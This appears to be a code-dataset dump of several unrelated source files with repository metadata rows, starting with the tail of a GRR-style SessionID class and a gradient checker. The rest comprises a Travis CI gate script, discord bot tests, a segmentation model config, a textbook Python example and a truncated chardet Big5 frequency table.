    if string_url.startswith(volume_url):
      result = string_url[len(volume_url):]
      # This must always return a relative path so we strip leading "/"s. The
      # result is always a unicode string.
      return result.lstrip("/")

    return None

  def __repr__(self):
    return "<%s age=%s>" % (self, self.age)
class Subject(RDFURN):
  """A pseudo attribute representing the subject of an AFF4 object."""
# Module-level default queue, used by SessionID when no queue is given.
DEFAULT_FLOW_QUEUE = RDFURN("F")
class SessionID(RDFURN):
  """An rdfvalue object that represents a session_id."""

  def __init__(self,
               initializer=None,
               age=None,
               base="aff4:/flows",
               queue=DEFAULT_FLOW_QUEUE,
               flow_name=None):
    """Constructor.

    Args:
      initializer: A string or another RDFURN.
      age: The age of this entry.
      base: The base namespace this session id lives in.
      queue: The queue to use.
      flow_name: The name of this flow or its random id.

    Raises:
      InitializeError: The given URN cannot be converted to a SessionID.
    """
    if initializer is None:
      # This SessionID is being constructed from scratch.
      if flow_name is None:
        flow_name = utils.PRNG.GetUInt32()

      if isinstance(flow_name, int):
        # Random integer ids are rendered in upper-case hex.
        initializer = RDFURN(base).Add("%s:%X" % (queue.Basename(), flow_name))
      else:
        initializer = RDFURN(base).Add("%s:%s" % (queue.Basename(), flow_name))
    else:
      if isinstance(initializer, RDFURN):
        try:
          self.ValidateID(initializer.Basename())
        except ValueError as e:
          # NOTE(review): `e.message` is Python 2 only; under Python 3 this
          # raises AttributeError. Use str(e) when porting.
          raise InitializeError(
              "Invalid URN for SessionID: %s, %s" % (initializer, e.message))
    super(SessionID, self).__init__(initializer=initializer, age=age)

  def Queue(self):
    # The queue is the part of the basename before the first ":".
    return RDFURN(self.Basename().split(":")[0])

  def FlowName(self):
    # Everything after the first ":" (may itself contain ":", e.g. hunts).
    return self.Basename().split(":", 1)[1]

  def Add(self, path, age=None):
    # Adding to a SessionID results in a normal RDFURN.
    return RDFURN(self).Add(path, age=age)

  @classmethod
  def ValidateID(cls, id_str):
    """Raise ValueError unless id_str matches "<queue>[:<part>[:<part>]]"."""
    # This check is weaker than it could be because we allow queues called
    # "DEBUG-user1" and IDs like "TransferStore". We also have to allow
    # flows session ids like H:123456:hunt.
    allowed_re = re.compile(r"^[-0-9a-zA-Z]+(:[0-9a-zA-Z]+){0,2}$")
    if not allowed_re.match(id_str):
      raise ValueError("Invalid SessionID: %s" % id_str)
# TODO(hanuszczak): Remove this class.
class FlowSessionID(SessionID):
  # Behaves exactly like SessionID; presumably kept only until the TODO above
  # is resolved.
  pass
| 28.069656 | 116 | 0.679911 |
ace8ba1ca38a94afe633e4bfecfe24510d532461 | 4,859 | py | Python | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | import numpy as np
from collections import OrderedDict
def compute_jacobian_finite_differences(x0, fn, epsilon):
    """Numerically estimate the Jacobian of *fn* at *x0* with forward differences.

    x0: The positions at which to compute J.
    fn: A function of the form fn(x) which returns a single numpy array.
    epsilon: A scalar or an array broadcastable to the shape of x0, giving the
        step size per input element.

    Returns a (x0.size, fn(x0).size) array J where J[i, j] approximates
    d fn_j / d x_i.
    """
    base = fn(x0)
    perturbation = np.zeros_like(x0)
    jac = np.zeros((x0.size, base.size), dtype=x0.dtype)
    steps = np.broadcast_to(epsilon, x0.shape)
    for idx in range(x0.size):
        step = steps.flat[idx]
        # Perturb one input element, evaluate, and difference against the base.
        perturbation.flat[idx] = step
        jac[idx, :] = ((fn(x0 + perturbation) - base) / step).flat
        perturbation.flat[idx] = 0
    return jac
def compute_jacobian_analytical(x0, y_shape, fn_grad, y_bp=None):
    """Build the Jacobian column-by-column from an analytical gradient function.

    x0: The position at which to compute J.
    y_shape: The shape of the backpropagated value, i.e. the shape of the
        output of the corresponding forward function 'fn'.
    fn_grad: Gradient function of the form x_grad = fn_grad(y_bp, x0), where
        'y_bp' is the backpropagated value and 'x0' is the original input.
    y_bp: Optional array with custom values for individually scaling the
        gradients; defaults to ones.

    Returns a (x0.size, prod(y_shape)) array.
    """
    dtype = x0.dtype
    y_size = int(np.prod(y_shape, dtype=np.int64))
    jacobian = np.zeros((x0.size, y_size), dtype=dtype)
    backprop = np.zeros(y_shape, dtype=dtype)
    if y_bp is None:
        scale = np.ones(y_shape, dtype=dtype)
    else:
        scale = np.broadcast_to(y_bp, y_shape)
    for col in range(y_size):
        # Backpropagate a one-hot (scaled) vector to obtain one column.
        backprop.flat[col] = scale.flat[col]
        jacobian[:, col] = fn_grad(backprop, x0).flat
        backprop.flat[col] = 0
    return jacobian
def check_gradients(x0,
                    fn,
                    fn_grad,
                    epsilon=1e-6,
                    rtol=1e-3,
                    atol=1e-5,
                    debug_outputs=None):
    """Checks if the numerical and analytical gradients are compatible for a function 'fn'

    x0: The position at which to compute the gradients.
    fn: A function of the form fn(x) which returns a single numpy array.
    fn_grad: The gradient of the original function with the form
        x_grad = fn_grad(y_bp, x0) where 'y_bp' is the backpropagated
        value and 'x0' is the original input to 'fn'. The output of
        the function is the gradient of x wrt to y.
    epsilon: A scalar or an array that can be broadcasted to the same
        shape as x0. This is used for computing the numerical Jacobian.
    rtol: The relative tolerance parameter used in numpy.allclose()
    atol: The absolute tolerance parameter used in numpy.allclose()
    debug_outputs: Optional dict-like object that receives additional outputs
        useful for debugging. If None (default), a private dict is used.

    Returns:
        True iff the analytical Jacobian matches the numerical one and the
        gradients scale linearly with the backpropagated values.
    """
    # Bug fix: the default used to be `debug_outputs=OrderedDict()` -- a
    # mutable default argument silently shared across all calls.
    if debug_outputs is None:
        debug_outputs = OrderedDict()

    dtype = x0.dtype
    y = fn(x0)  # compute y to get the shape

    # Sanity checks: a zero backprop vector must yield a zero gradient with
    # the same shape as x0.
    grad = fn_grad(np.zeros(y.shape, dtype=dtype), x0)
    grad_shape_correct = x0.shape == grad.shape
    if not grad_shape_correct:
        print(
            'The shape of the gradient [{0}] does not match the shape of "x0" [{1}].'
            .format(grad.shape, x0.shape))
    zero_grad = np.count_nonzero(grad) == 0
    if not zero_grad:
        print('The gradient is not zero for a zero backprop vector.')

    ana_J = compute_jacobian_analytical(x0, y.shape, fn_grad)
    # Jacobian for doubled backprop values; must be exactly twice ana_J if
    # the gradient is linear in the backpropagated value.
    ana_J2 = compute_jacobian_analytical(x0, y.shape, fn_grad,
                                         2 * np.ones(y.shape, dtype=x0.dtype))
    num_J = compute_jacobian_finite_differences(x0, fn, epsilon)
    does_scale = np.allclose(0.5 * ana_J2, ana_J, rtol, atol)
    isclose = np.allclose(ana_J, num_J, rtol, atol)
    ana_J_iszero = np.all(ana_J == 0)
    if ana_J_iszero and not np.allclose(num_J, np.zeros_like(num_J), rtol,
                                        atol):
        print(
            'The values of the analytical Jacobian are all zero but the values of the numerical Jacobian are not.'
        )
    elif not does_scale:
        print(
            'The gradients do not scale with respect to the backpropagated values.'
        )
    if not isclose:
        print('The gradients are not close to the numerical Jacobian.')

    debug_outputs.update(
        OrderedDict([
            ('isclose', isclose),
            ('does_scale', does_scale),
            ('ana_J_iszero', ana_J_iszero),
            ('grad_shape_correct', grad_shape_correct),
            ('zero_grad', zero_grad),
            ('ana_J', ana_J),
            ('num_J', num_J),
            ('absdiff', np.abs(ana_J - num_J)),
        ]))
    result = isclose and does_scale
    return result
| 32.393333 | 114 | 0.599918 |
ace8ba2fbdb71ee146225b70ea940e7c3faefe92 | 4,478 | py | Python | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | 1 | 2019-12-14T21:55:24.000Z | 2019-12-14T21:55:24.000Z | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | null | null | null | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 25 16:27:55 2018
@author: acer4755g
"""
import REQUESTMETHOD2
import json
import sys
import os
import getopt
import logging
import subprocess
# help message
def helpMessgae():
    """Print the command line usage text for ci.py.

    NOTE(review): the function name is misspelled ("Messgae") but kept as-is
    because it is called by name further down in this script.
    """
    print("""Usage: python ci.py [options]
[options]
-u the username, e.g. jiankaiwang (necessary)
-n the repository name, e.g. umap (necessary)
-t the travis token (necessary)
-p the cd path (necessary)
-h, --help the help message
""")
# parse opts
def parseOpts(get_opts):
    """Convert getopt's list of (flag, value) pairs into a flag -> value dict."""
    return dict(get_opts)
def get_Travis_Repo_API(user, repo_name):
    """Look up a repository on the Travis CI API.

    Args:
        user: the GitHub username, e.g. "jiankaiwang".
        repo_name: the repository name, e.g. "umap".

    Returns:
        The parsed JSON response dict on success; otherwise {"id": -1}.
        Bug fix: the failure sentinel is now the int -1 so the caller's
        `travis_repo_id == -1` check can actually trigger (it previously
        returned the string "-1", which never compares equal to int -1).
    """
    travis_repo_api = REQUESTMETHOD2.SENDREQUEST(
        "http://api.travis-ci.org/repos/{}/{}".format(user, repo_name),
        {}, {}, "GET")
    travis_repo_api_res = travis_repo_api.response()
    travis_repo_api_res_json = json.loads(travis_repo_api_res["response"])
    if "id" in travis_repo_api_res_json.keys():
        return travis_repo_api_res_json
    else:
        return {"id": -1}
def get_Travis_Repo_Build_API(repo_id, token):
    """Fetch the latest build of a Travis CI repository.

    Args:
        repo_id: the numeric Travis repository id.
        token: the Travis API token.

    Returns:
        The parsed JSON response on success. On failure, returns a sentinel
        dict shaped like a real response so the caller's
        `res["builds"][0]["commit"]["sha"]` access works and its
        `sha == -1` check triggers.
        Bug fix: the previous sentinel was {"sha": "-1"}, which has no
        "builds" key, so the caller crashed with KeyError on failure
        instead of exiting gracefully.
    """
    travis_ci_api = REQUESTMETHOD2.SENDREQUEST(
        "https://api.travis-ci.org/repo/{}/builds?limit=1".format(repo_id),
        {"Authorization": "token {}".format(token),
         "Travis-API-Version": "3",
         "User-Agent": "API Explorer"},
        {}, "GET")
    travis_ci_api_res = travis_ci_api.response()
    travis_ci_api_res_json = json.loads(travis_ci_api_res["response"])
    if "builds" in travis_ci_api_res_json.keys():
        return travis_ci_api_res_json
    else:
        return {"builds": [{"commit": {"sha": -1}, "state": "errored"}]}
def get_local_commit(getwd):
    """Return the HEAD commit sha of the local git repository at *getwd*.

    Args:
        getwd: the path of the local repository (the process cwd is changed
            to it as a side effect).

    Returns:
        The commit sha as a string on success, or the int -1 on failure.
        Bug fix: the failure value used to be the string "-1", which never
        compared equal to the caller's int `local_sha == -1` check, so a
        failed lookup silently fell through to the CD path.
    """
    os.chdir(getwd)
    bashCommand = "git rev-parse HEAD"
    logging.debug(bashCommand)
    try:
        # A shell is needed on POSIX platforms to resolve the command string;
        # this also covers platforms that are neither "win*" nor "lin*"
        # (e.g. darwin), which previously left `process` undefined.
        use_shell = not sys.platform.startswith("win")
        process = subprocess.Popen(
            bashCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            stdin=subprocess.PIPE, shell=use_shell)
        output, error = process.communicate()
        logging.warning('Output:{},Error:{}'.format(
            output.decode('utf-8'), error.decode('utf-8')))
        return output.decode('utf-8')
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # still propagate.
        logging.warning("Can not get local master commit.")
        return -1
# main entry: parse flags, then decide (via the exit code) whether the
# caller should continue with the CD step. Exit 0 = proceed, 1 = stop.
logging.basicConfig(level=logging.WARNING)
# "f" is accepted in the optstring but currently unused.
opts, args = getopt.getopt(sys.argv[1:], "fhu:n:p:t:", ["help"])
opts = parseOpts(opts)

if len(opts) < 1:
    logging.debug("opts < 1")
    helpMessgae()
elif '--help' in opts.keys() or '-h' in opts.keys():
    logging.debug("opts exists help")
    helpMessgae()
else:
    # Validate required flags; -p must also point at an existing path.
    if "-p" not in opts.keys() or len(opts["-p"]) < 1 or (not os.path.exists(opts["-p"])):
        logging.warning("No assigned respoitory.")
        sys.exit(1)
    if "-u" not in opts.keys() or len(opts["-u"]) < 1:
        logging.warning("No assigned username.")
        sys.exit(1)
    if "-n" not in opts.keys() or len(opts["-n"]) < 1:
        logging.warning("No assigned repository.")
        sys.exit(1)
    if "-t" not in opts.keys() or len(opts["-t"]) < 1:
        logging.warning("No assigned travis token.")
        sys.exit(1)

    # Resolve the Travis repository id from the user/repo name.
    travis_repo_api_res_json = get_Travis_Repo_API(opts["-u"], opts["-n"])
    travis_repo_id = travis_repo_api_res_json["id"]
    # NOTE(review): get_Travis_Repo_API's failure sentinel must be the int -1
    # for this comparison to trigger -- verify its return value.
    if travis_repo_id == -1:
        logging.warning("No such repository in Travis.")
        sys.exit(1)

    # Fetch the latest build's commit sha and state.
    travis_ci_api_res_json = get_Travis_Repo_Build_API(travis_repo_id, opts["-t"])
    travis_ci_api_sha, travis_ci_api_build = \
        travis_ci_api_res_json["builds"][0]["commit"]["sha"]\
        , travis_ci_api_res_json["builds"][0]["state"]
    # NOTE(review): same sentinel-type caveat applies to this -1 check.
    if travis_ci_api_sha == -1:
        logging.warning("Token key is not allowed.")
        sys.exit(1)
    if travis_ci_api_build != "passed":
        logging.warning("CI build failed. Not to CD.")
        sys.exit(1)

    # Compare the CI commit with the local repository's HEAD.
    local_sha = get_local_commit(opts["-p"])
    # NOTE(review): get_local_commit's failure sentinel must be the int -1
    # for this comparison to trigger -- verify its return value.
    if local_sha == -1:
        logging.warning("Can not get commit sha from local git repository.")
        sys.exit(1)
    else:
        if local_sha.strip() == travis_ci_api_sha.strip():
            logging.warning("Already the latest commit. No need to CD.")
            sys.exit(1)
        elif len(local_sha.strip()) < 1:
            logging.warning("No git found or no commit. Can's start CD.")
            sys.exit(1)

    # All checks passed: signal the caller to proceed with CD.
    sys.exit(0)
| 31.985714 | 134 | 0.622376 |
ace8bb5ae01db7892402930627483c481a396350 | 436 | py | Python | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 122 | 2016-08-05T02:27:31.000Z | 2022-03-21T07:53:10.000Z | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 15 | 2017-12-07T14:28:20.000Z | 2021-11-19T13:03:37.000Z | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 100 | 2016-08-21T18:12:29.000Z | 2022-02-19T11:21:23.000Z | import discord
import pytest
bot_channel = 165174405222236161
@pytest.mark.asyncio
async def test_message(bot):
    """Send a plain text message to the bot test channel.

    Bug fix: the fixture is named *bot*, but the original code referenced an
    undefined global *client*, raising NameError on every run.
    """
    channel = bot.get_channel(bot_channel)
    await channel.send("Test Message")
@pytest.mark.asyncio
async def test_embed(bot):
    """Send an embed with a single field to the bot test channel.

    Bug fix: the fixture is named *bot*, but the original code referenced an
    undefined global *client*, raising NameError on every run.
    """
    channel = bot.get_channel(bot_channel)
    embed = discord.Embed(title="Test Embed")
    embed.add_field(name="Field 1", value="Lorem ipsum")
    await channel.send(embed=embed)
| 21.8 | 56 | 0.745413 |
ace8bcad5cdbd9f1f50c1398795bc86f9911aa9f | 1,280 | py | Python | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | 2 | 2020-07-10T12:13:56.000Z | 2020-11-09T07:09:29.000Z | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | null | null | null | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | 2 | 2020-07-28T09:12:55.000Z | 2021-01-04T07:49:59.000Z | # model settings
# Normalization layer shared by backbone and heads: synchronized BatchNorm
# with learnable affine parameters.
norm_cfg = dict(type='SyncBN', requires_grad=True)

# Encoder-decoder segmentor: ResNet-50-v1c backbone + ISA decode head
# + FCN auxiliary head.
model = dict(
    type='EncoderDecoder',
    pretrained='open-mmlab://resnet50_v1c',
    backbone=dict(
        type='ResNetV1c',
        depth=50,
        num_stages=4,
        out_indices=(0, 1, 2, 3),  # expose all four stage outputs
        dilations=(1, 1, 2, 4),    # dilate stages 3-4 instead of striding
        strides=(1, 2, 1, 1),
        norm_cfg=norm_cfg,
        norm_eval=False,
        style='pytorch',
        contract_dilation=True),
    decode_head=dict(
        type='ISAHead',
        in_channels=2048,          # fed from backbone stage index 3
        in_index=3,
        channels=512,
        isa_channels=256,
        down_factor=(8, 8),
        dropout_ratio=0.1,
        num_classes=19,
        norm_cfg=norm_cfg,
        align_corners=False,
        loss_decode=dict(
            type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
    # Auxiliary FCN head on stage index 2, with a down-weighted loss (0.4).
    auxiliary_head=dict(
        type='FCNHead',
        in_channels=1024,
        in_index=2,
        channels=256,
        num_convs=1,
        concat_input=False,
        dropout_ratio=0.1,
        num_classes=19,
        norm_cfg=norm_cfg,
        align_corners=False,
        loss_decode=dict(
            type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)))
# model training and testing settings
train_cfg = dict()
test_cfg = dict(mode='whole') | 28.444444 | 74 | 0.5875 |
ace8bdb3f1d4b87d2a9552de9c3ac8988202f400 | 640 | py | Python | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 35 | 2019-05-03T00:30:31.000Z | 2022-01-20T06:57:25.000Z | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 1 | 2020-09-04T02:04:33.000Z | 2020-09-04T02:04:33.000Z | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 22 | 2020-05-13T21:20:02.000Z | 2021-12-21T08:35:59.000Z | # This program demonstrates keyword arguments.
def main():
    """Demonstrate calling a function with keyword arguments."""
    # Keyword arguments may be passed in any order; here: $10,000 principal,
    # 1% interest rate per period, over 10 periods.
    show_interest(principal=10000.0, rate=0.01, periods=10)
def show_interest(principal, rate, periods):
    """Display the amount of simple interest for a loan.

    Args:
        principal: the amount on which interest accrues.
        rate: the interest rate per period.
        periods: the number of periods.
    """
    interest = principal * rate * periods
    formatted = format(interest, ',.2f')
    print('The simple interest will be $' + formatted)
# Call the main function.
main()
| 30.47619 | 60 | 0.690625 |
ace8bf4075ac6431c0db62aaafe879fd9615d1da | 30,537 | py | Python | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Modified Work: Copyright (c) 2018, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
# Original Work: Copyright (c) 2018 Character Encoding Detector contributors. https://github.com/chardet
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
# About 25% of the ideal distribution ratio (2.98) -- see the derivation in
# the comment block above.
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75

#Char to FreqOrder table
# Number of entries in the BIG5_CHAR_TO_FREQ_ORDER tuple that follows.
BIG5_TABLE_SIZE = 5376
BIG5_CHAR_TO_FREQ_ORDER = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
